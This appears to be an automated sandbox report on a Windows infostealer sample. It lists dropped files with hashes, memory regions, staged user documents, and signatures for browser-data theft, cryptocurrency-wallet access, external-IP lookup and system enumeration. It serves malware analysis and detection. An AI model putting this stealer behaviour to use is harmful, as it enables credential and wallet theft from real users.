| MD5 | daa2eed9dceafaef826557ff8a754204 |
| SHA1 | 27d668af7015843104aa5c20ec6bbd30f673e901 |
| SHA256 | 4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914 |
| SHA512 | 7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_ssl.pyd
| MD5 | 0c06eff0f04b3193a091aa6f77c3ff3f |
| SHA1 | fdc8f3b40b91dd70a65ada8c75da2f858177ca1b |
| SHA256 | 5ecfe6f6ddf3b0a150e680d40c46940bc58334d0c622584772800913d436c7e2 |
| SHA512 | 985974e1487bbb8f451588f648a4cf4d754dbfc97f1ab4733dd21cdeb1a3abad017c34ed6ee4bc89ac01ea19b6060ea8f817693336133d110b715c746d090e49 |
memory/1888-52-0x00007FFECFFB0000-0x00007FFECFFBF000-memory.dmp
memory/1888-51-0x00007FFECC720000-0x00007FFECC744000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_sqlite3.pyd
| MD5 | 00a246686f7313c2a7fe65bbe4966e96 |
| SHA1 | a6c00203afab2d777c99cc7686bab6d28e4f3f70 |
| SHA256 | cd3ade57c12f66331cb4d3c39276cbb8b41176026544b1ca4719e3ce146efe67 |
| SHA512 | c0e0f03616336f04678a0a16592fdc91aaa47c9bf11500a5dc3696aef4481f2fcbd64a82be78b30f3ffd4372c9e505edb000bdf05f2ad07bac54a457bb20bf7e |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_socket.pyd
| MD5 | abe1268857e3ace12cbd532e65c417f4 |
| SHA1 | dd987f29aabc940f15cd6bd08164ff9ae95c282f |
| SHA256 | 7110390fa56833103db0d1edbfd2fe519dd06646811402396eb44918b63e70d5 |
| SHA512 | 392ac00c9d9e5440a8e29e5bae3b1a8e7ffb22a01692dad261324058d8ef32fedf95e43a144b7e365f7f0fedb0efb6f452c7ccaee45e41e2d1def660d11173c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_queue.pyd
| MD5 | 3f13115b323fb7516054ba432a53e413 |
| SHA1 | 340b87252c92c33fe21f8805acb9dc7fc3ff8999 |
| SHA256 | 52a43a55458c7f617eb88b1b23874f0b5d741e6e2846730e47f09f5499dda7f2 |
| SHA512 | 6b0383ee31d9bb5c1227981eb0ae5bb40e2d0a540bd605d24e5af455fd08935d726e5f327787d9340950311d8f7a655a7ea70635e1f95d33e089505f16ae64b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_lzma.pyd
| MD5 | 8bdd52b7bcab5c0779782391686f05c5 |
| SHA1 | 281aad75da003948c82a6986ae0f4d9e0ba988eb |
| SHA256 | d5001fbee0f9c6e3c566ac4d79705ba37a6cba81781eee9823682de8005c6c2a |
| SHA512 | 086c5e628b25bc7531c2e2f73f45aa8f2182ac12f11f735b3adc33b65a078a62f7032daa58cc505310b26b4085cae91cb4fa0a3225fbe6f2b2f93287fee34d4c |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_hashlib.pyd
| MD5 | 82d28639895b87f234a80017a285822a |
| SHA1 | 9190d0699fa2eff73435adf980586c866639205f |
| SHA256 | 9ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e |
| SHA512 | 4b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_decimal.pyd
| MD5 | 072e08b39c18b779446032bf2104247b |
| SHA1 | a7ddad40ef3f0472e3c9d8a9741bd97d4132086c |
| SHA256 | 480b8366a177833d85b13415e5bb9b1c5fda0a093ea753940f71fa8e7fc8ed9b |
| SHA512 | c3cdfe14fd6051b92eeff45105c093dce28a4dcfd9f3f43515a742b9a8ee8e4a2dce637e9548d21f99c147bac8b9eb79bcbcd5fc611197b52413b8a62a68da02 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\_bz2.pyd
| MD5 | db5ec505d7c19345ca85d896c4bd7ef4 |
| SHA1 | c459bb6750937fbdc8ca078a74fd3d1e8461b11c |
| SHA256 | d3fb8bad482505eb4069fa2f2bb79e73f369a4181b7acc7abe9035ecbd39cec9 |
| SHA512 | 0d9fdb9054e397bc9035301e08532dc20717ec73ad27cf7134792a859ca234ab0cd4afa77d6cb2db8c35b7b0bccf49935630b3fe1bd0a83a9be228b9c3d8c629 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\unicodedata.pyd
| MD5 | 26f7ccda6ba4de5f310da1662f91b2ba |
| SHA1 | 5fb9472a04d6591ec3fee7911ad5b753c62ecf17 |
| SHA256 | 1eae07acffb343f4b3a0abbaf70f93b9ec804503598cfffdeec94262b3f52d60 |
| SHA512 | 0b5e58945c00eefc3b9f21a73359f5751966c58438ae9b86b6d3ffd0f60a648676b68a0109fa2fe1260d1b16c16b026e0c1d596fec3443638d4ce05ea04665ca |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\sqlite3.dll
| MD5 | dcc391b3b52bac0f6bd695d560d7f1a9 |
| SHA1 | a061973a5f7c52c34a0b087cc918e29e3e704151 |
| SHA256 | 762adf4e60bff393fba110af3d9694cbbdc3c6b6cd18855a93411ea8e71a4859 |
| SHA512 | 42a2606783d448200c552389c59cbf7c5d68a00911b36e526af013e9b8e3a1daa80327cb30efe0fe56323635cc2cb37bd3474b002058ba59f65e2a9d8f6046b8 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\select.pyd
| MD5 | 062f0a9179c51d7ed621dac3dd222abd |
| SHA1 | c7b137a2b1e7b16bfc6160e175918f4d14cf107c |
| SHA256 | 91bea610f607c8a10c2e70d687fb02c06b9e1e2fa7fcfab355c6baea6eddb453 |
| SHA512 | b5a99efd032f381d63bc46c9752c1ddec902dae7133a696e20d3d798f977365caf25874b287b19e6c52f3e7a8ae1beb3d7536cd114775dc0af4978f21a9e818e |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\libssl-1_1.dll
| MD5 | eac369b3fde5c6e8955bd0b8e31d0830 |
| SHA1 | 4bf77158c18fe3a290e44abd2ac1834675de66b4 |
| SHA256 | 60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c |
| SHA512 | c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778 |
C:\Users\Admin\AppData\Local\Temp\_MEI39842\blank.aes
| MD5 | ea55d3a1748ffe306acf41f8e40f36b8 |
| SHA1 | 8c32bf9b958b576b1fcb8a0871fdb0d3bbdd00d3 |
| SHA256 | a265a607674d83a053bd0d6c293a6d191d012ac979bc1707646104d2ff81a279 |
| SHA512 | da577f2cabcf0748edc1a413079388cac5c9bc13912939e109aa14fa415d3b9041ebf849ce6775d8a2411d81f79f84d433be14debbe53ea3b8647f7e94f29e42 |
memory/1888-58-0x00007FFECC6F0000-0x00007FFECC71D000-memory.dmp
memory/1888-61-0x00007FFECC6B0000-0x00007FFECC6C9000-memory.dmp
memory/1888-62-0x00007FFECC680000-0x00007FFECC6A3000-memory.dmp
memory/1888-64-0x00007FFEC8A60000-0x00007FFEC8BD0000-memory.dmp
memory/1888-66-0x00007FFECC660000-0x00007FFECC679000-memory.dmp
memory/1888-68-0x00007FFECC440000-0x00007FFECC44D000-memory.dmp
memory/1888-70-0x00007FFEC97E0000-0x00007FFEC980E000-memory.dmp
memory/1888-72-0x00007FFEC9360000-0x00007FFEC9418000-memory.dmp
memory/1888-75-0x00007FFEB8F90000-0x00007FFEB9305000-memory.dmp
memory/1888-76-0x00007FFEB9310000-0x00007FFEB98F9000-memory.dmp
memory/1888-77-0x00000191DD610000-0x00000191DD985000-memory.dmp
memory/1888-80-0x00007FFEC9720000-0x00007FFEC9734000-memory.dmp
memory/1888-79-0x00007FFECC720000-0x00007FFECC744000-memory.dmp
memory/1888-82-0x00007FFECC430000-0x00007FFECC43D000-memory.dmp
memory/1888-86-0x00007FFECC680000-0x00007FFECC6A3000-memory.dmp
memory/1888-87-0x00007FFEC8940000-0x00007FFEC8A5C000-memory.dmp
memory/4460-100-0x00000219D3F20000-0x00000219D3F42000-memory.dmp
memory/4460-105-0x00000219D40D0000-0x00000219D4146000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dhl00lus.bjj.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
\??\c:\Users\Admin\AppData\Local\Temp\xekh2uue\xekh2uue.cmdline
| MD5 | 35a98f04fa5008f16b2a176deb5c6f73 |
| SHA1 | 092bf3786ee5ffffd335e46fc039ad543ea2350f |
| SHA256 | b3caeeac6899947e541dc00ef3775c2f666c4fad5d9081e8657f1f794c0ae1b1 |
| SHA512 | d181a01c4b11a13821d2e86cc8a191551eda6f5f2c19bfed3a7c317bb41fc3d809f8b118ede1b2d21cec899500e9785909f46852e2136d7284a07625444fc1da |
\??\c:\Users\Admin\AppData\Local\Temp\xekh2uue\xekh2uue.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3171db904a7492a2e565e141ea3c1d71 |
| SHA1 | 86f6b4e546d80c07e1739a700e331329f58382fd |
| SHA256 | 4bad63ee2fb167c105ce7f68dc3ca8e4565407fd6902cb789e69d65e090228d5 |
| SHA512 | 21ce494aae6a0560c040003c09686af727af06584c18735b4bb1bd46d005af82be9b1d5ae467172cddffb6f847389a415002dc29b1d472ea305eabcd64b54b3f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3de7dfd15c46f7130d4fc1fa4770b295 |
| SHA1 | b677f2c050b0846f0b646a2dd3c3bf2e71bbcf02 |
| SHA256 | 2b4f720648bd3c70c150286a116c66aa42bede7e9d0e8f160761bb3dc0bdf9e9 |
| SHA512 | b71a3cc929ec5769e5468b6b66d986a2d96c660b2e7073fc9ae6d2ca4e777d980fda1e69f9937bc77171c79090275fc7f5e0deaa7a13729bd00973f179127acb |
\??\c:\Users\Admin\AppData\Local\Temp\xekh2uue\CSCCD4F73C5ACAD48F4AFE3FECBF2D4D04C.TMP
| MD5 | b6f12fe3db4c77d5f5dd2adf1b791313 |
| SHA1 | 38a3eef7490defda5dc40c9ac3264c56cbef801d |
| SHA256 | 6bd0ea85403cac0a09ccce5ec3bfce33f4ee3219dee6088c8e783724db541b76 |
| SHA512 | ea059b9adb4aea517b753792a9dee6defa969af827202750fc0e9fbe5d6c2f8daa935eebf65cccc097e0879eb72ee9ebac87e5b7583f76989daf9a7f167e2fd4 |
C:\Users\Admin\AppData\Local\Temp\RES8AAC.tmp
| MD5 | c7b6b7bce6b78955495a2625b22f9c25 |
| SHA1 | df43987c041c8303968afc29d0fb0b3defed157b |
| SHA256 | 5f3f1b6cb621b84c45ac9a120b86d2214ad09e5801358fa5d1761e4537579995 |
| SHA512 | c0fec96a25f8daac096c165750d0837d00bff091cbd3bbd2e5a810331c22aa03946a9e7d1673b96b1af3cd7a17dfd36ce85b954d3fcd5a071f24904661552b13 |
C:\Users\Admin\AppData\Local\Temp\xekh2uue\xekh2uue.dll
| MD5 | dd00cec28a2341e3468550a6dc29e49f |
| SHA1 | 62c63fb0ff2ec618b97e166288f374680e19ded8 |
| SHA256 | a6f8e45b732d69d6f8d10ddb2c353126e9e4ea9cef04ec9826c218f3af0f9905 |
| SHA512 | 94045c11d077484ead215955ef16a917c8554ea81b6b1edd25e680c1b81c5c7b5ec1aeba96f0955fdb92900d9c9835244f6fc65c8df83044e1f85873b0f2683c |
memory/3608-347-0x000001B936180000-0x000001B936188000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 001535b7977964466510bf6f1975ed5e |
| SHA1 | 6583c2f159e131d53b4dee76556b8559e7c63608 |
| SHA256 | 5e92aab081f2e9e1a31ccd7a289fc386c69893cddfff25a1f68cda0d61b848d8 |
| SHA512 | 3f48796974fc6d9b4182070ccb31c2147aacef6445c478114120a8a1eb5936751d99b77fe8e62ec2c4e6c3908078f572541540eb2af5b89c066fb4e5ef621ffc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10b5b55738776d12f93ff0bd95f64512 |
| SHA1 | 35ef6d5365530b8310c3559f28afbfd8b72a1fe7 |
| SHA256 | c46148d16931accd87003d6bccf4d449bca45c642ebd25213deca270b94e9738 |
| SHA512 | ae258c941eab15f041cd9cb3c2896e1a50e0936d5fc3f712c61f9501575dc8396d5e86d8988fca609f96857d1b5901b0c4bf251e731433234d451d7b591638c8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b721b21f475be36eee76eb7dc3e479b8 |
| SHA1 | e4ec21b1f2ed4a3d29e55ad4350fa54c9b13e53c |
| SHA256 | caff144bf4be3976720feb58d440318d242c86a89f0c3b0133a360391015fe4d |
| SHA512 | fcc865cab4dcc809efb5559f7882764e30d7db05284515e150cf2b43b4ed22af2cb37139302f69fed4c31fc8bcf1aaee9ebb6dddeaa85b7426a8db15509d551b |
memory/1888-377-0x00007FFEC8A60000-0x00007FFEC8BD0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\UnblockRepair.jpeg
| MD5 | 18c29e54b7cbbfccb1a317a65386e91a |
| SHA1 | b638ffee21424e35be05749f511185887ca221b7 |
| SHA256 | 0ce9a171ce4e29acbffd219fd11fe371070059cb3f0b90e5ddfdb64769826b39 |
| SHA512 | f2bf80db7730eaaaee603829bbb453ff89cdc4617fb2a7d1d2c762839161b1e5c12dac352373235516ec6a7ec8b9d479a4bf48d3b1a041c4198e5a3b175d2af3 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BackupComplete.xml
| MD5 | 8e66242c054660d62162b7e530749362 |
| SHA1 | 4d00f8d0f7135c11d7f8d26de8be9691bd7a5418 |
| SHA256 | 5ef7596245c38315198b54a6bc32cc4d62c6f9acd1e20d7697f395e456e5052c |
| SHA512 | 1986e03a4a79fdca0aece357c148cdf205aaa4da1990a7db66a223f15b0522104e3a58485934b31c1310f8f85ffaa7cb98eb0ab9e7524ccc7304c3e83f56bb00 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\DenyInvoke.pdf
| MD5 | cfe3dc807f1a8ad47c4037867bd14955 |
| SHA1 | 2e9bbe50ec69a4ff6906534938c313737df25488 |
| SHA256 | 3a93a7646ae8dd2564af15eeeb0495b85b14da74ce2bb412aaedec75d3338483 |
| SHA512 | f74eceb19e682bcf5f8ddcbc6450fdbb56d7c9c3acba332a6cff30670300f72ad297bb62cd35cb2ba3716826a8063eaeb5a69394079d706d8a1d010bf3898b5d |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\FindUninstall.docx
| MD5 | 616bcb0e3b6c8e315cc8c4bfaf9c28ab |
| SHA1 | ff9e7f5117567f813b9068c6856f49c0f02679a2 |
| SHA256 | 12ce4f5244a9ebfc009be677c91ca8bfb90b1fa2c63cf5791ea4e667bfec0fb1 |
| SHA512 | 385e55666c817a5027d45ddfc877156268419140cb478ab92368c914726b2b1261a25c891b2b9fafe0fd2a9b12607f41d76bd96f9f590881761fc08a28f8bd4e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SearchSkip.docx
| MD5 | cc5eaea31fa93bb6bf29a63a226b7f1d |
| SHA1 | 572d7e99783957d4dd980664148ea3a17d33580b |
| SHA256 | 820b99ce3547d8b1b2a9c7007650ed09b627af61af9e8f4fe625fd4244ee4f0e |
| SHA512 | 27d1cc64989b95d78a5ce4f33c55c4a87681bbb70ca25cf690661ea8755b72de92423f11df985efb094bb0e4d3158e7c0880f4082d507f8d74c8aae55915c61b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SendRevoke.csv
| MD5 | cb981d9101730d4fb39d9ac53cccaf6b |
| SHA1 | c665c734aa4c86644fd91db1e3c6a033c37e23b5 |
| SHA256 | 1e52e854c145f528664513605b6894acebb96eb06dc3b266b15ffa51a92250da |
| SHA512 | 3afe3b81672c939941509d6d861658ca9fbf06f14caa61cb3aa7259493b27284ded4c5df69c9d4c361d2772ab4b11d1081c4a989705584232ac4fdb183b448e9 |
memory/1888-393-0x00007FFECC660000-0x00007FFECC679000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\BackupSelect.m1v
| MD5 | 37efa3e23251c9f3a5d59991123de46e |
| SHA1 | 8f814a4b70e8f1970756ca6e39943e24b0be7b0a |
| SHA256 | 313e4c8de7215a8e1a2d2179ac4c7fd85f37e7062c281d97f7c47943b1ddcb4b |
| SHA512 | 0a82ecdf854c1b96097dd26a044b319ed8c0b4712924eb34231408fb0754545428445eb7621fd9fcc54d97d6f46b3344b3ca17e9acd2e9ff1b4d309382d4b43f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\BackupResize.svg
| MD5 | 2c46def812aa0261ad3b8700fa04d5e3 |
| SHA1 | 7a1efc8066a71b98e4d3d62f28225078dbb12850 |
| SHA256 | b7810e725f32307691aa72f68a3a74286b9d8da4e9f3111550838fca30c4a2e4 |
| SHA512 | 31f30d8aebe6df4ccc284b93fc05507a4556815ed285ce7e4a2746d3e35ece66aae2d6406d49feadcb67d7e137454bd1c7c99579f202756f2520a106fb3628b5 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\WaitResolve.jpg
| MD5 | a53a7aebe55d52f57cffe57ecc51cb40 |
| SHA1 | e97109c7395fbdf33bf54a88b86f4aebff43adad |
| SHA256 | 132af49c7833421351afa568792848d07046b219e3d3a065d2c35af4786538b8 |
| SHA512 | 6f17f35df033ac9f532bf0dcc94380713df409899f279003dc780ff736a1ecde29805268dc335197eaab4aae4df8a4b552292d0b4e59603f37c25efe6566baa8 |
memory/1888-444-0x00007FFEB9310000-0x00007FFEB98F9000-memory.dmp
memory/1888-456-0x00007FFEC9720000-0x00007FFEC9734000-memory.dmp
memory/1888-459-0x00007FFEC97E0000-0x00007FFEC980E000-memory.dmp
memory/1888-455-0x00007FFEB8F90000-0x00007FFEB9305000-memory.dmp
memory/1888-454-0x00007FFEC9360000-0x00007FFEC9418000-memory.dmp
memory/1888-450-0x00007FFEC8A60000-0x00007FFEC8BD0000-memory.dmp
memory/1888-445-0x00007FFECC720000-0x00007FFECC744000-memory.dmp
memory/1888-460-0x00000191DD610000-0x00000191DD985000-memory.dmp
memory/1888-489-0x00007FFECC430000-0x00007FFECC43D000-memory.dmp
memory/1888-496-0x00007FFECC680000-0x00007FFECC6A3000-memory.dmp
memory/1888-500-0x00007FFEC97E0000-0x00007FFEC980E000-memory.dmp
memory/1888-499-0x00007FFECC440000-0x00007FFECC44D000-memory.dmp
memory/1888-498-0x00007FFECC660000-0x00007FFECC679000-memory.dmp
memory/1888-497-0x00007FFEC8A60000-0x00007FFEC8BD0000-memory.dmp
memory/1888-495-0x00007FFECC6B0000-0x00007FFECC6C9000-memory.dmp
memory/1888-494-0x00007FFECC6F0000-0x00007FFECC71D000-memory.dmp
memory/1888-493-0x00007FFECFFB0000-0x00007FFECFFBF000-memory.dmp
memory/1888-492-0x00007FFECC720000-0x00007FFECC744000-memory.dmp
memory/1888-491-0x00007FFEB9310000-0x00007FFEB98F9000-memory.dmp
memory/1888-487-0x00007FFEB8F90000-0x00007FFEB9305000-memory.dmp
memory/1888-486-0x00007FFEC9360000-0x00007FFEC9418000-memory.dmp
memory/1888-490-0x00007FFEC8940000-0x00007FFEC8A5C000-memory.dmp
memory/1888-488-0x00007FFEC9720000-0x00007FFEC9734000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
